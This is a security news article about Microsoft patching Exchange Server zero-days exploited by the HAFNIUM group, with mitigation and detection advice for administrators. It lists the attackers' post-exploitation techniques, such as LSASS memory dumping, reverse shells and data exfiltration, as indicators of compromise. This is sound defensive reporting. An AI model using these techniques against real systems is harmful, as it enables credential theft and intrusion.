- Microsoft has fixed several 0-day flaws that Chinese hackers were exploiting.
- The vulnerabilities were chained together to achieve a high-level compromise, data access, and exfiltration.
- The actors went on undeterred for at least two months already, so updating now is exigent.
Microsoft has confirmed the existence of multiple 0-day exploits on the Exchange Server that are being actively used by an actor called “HAFNIUM.” This is a group of hackers that primarily targets US-based entities and is believed to be supported by the Chinese group supported by the state.
While the attacks appear to be limited according to Microsoft, they were very damaging, as the hackers may have accessed email accounts through compromised Exchange servers, could have installed malware, and may have planted web shell backdoors to help them move around.
The IDs of the newly discovered 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in the latest update. The affected MS Exchange Server versions include 2013, 2016, and also 2019. The actors have chained these flaws to carry out a powerful attack, which is indicative of their sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three aren’t related to the HAFNIUM attacks.
If you’re unable to apply the fixing patch right now, you may apply the mitigation of setting up a VPN to separate the Exchange server from external access. Note that this will only stop the first step of the attack, which is to establish an untrusted connection to Exchange server port 443. Still, it may be enough to cause a disruption. If the attacker has already compromised your server, though, this mitigation won’t make any difference whatsoever.
As Microsoft details, HAFNIUM performed the following post-exploitation activity:
- Used Procdump to dump the LSASS process memory
- Used 7-Zip to compress and exfiltrate stolen data
- Added and used Exchange PowerShell snap-ins to export mailbox data
- Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
- Downloaded PowerCat straight from GitHub and used it to open a remote server connection
Thus, if you are an Exchange server admin, consider the above signs of trouble and actively scan your log files to detect any indicators of compromise. If you see any ZIPs, RARs, or 7z files on C:\ProgramData\, consider your data exfiltrated. According to Microsoft, the actors like to download the Exchange offline address book, so they grab organization and user information too.
If you find that you’re already under attack by HAFNIUM, check out this piece to figure out how to develop effective defending mechanisms. The most urgent action to take right now, though, is to update all externally facing Exchange Servers.
Finally, according to a blog post by Volexity researchers, who were the ones to discover these attacks and report them to Microsoft, the first signs of active exploitation of the aforementioned flaws appeared as far back as January 6, 2021.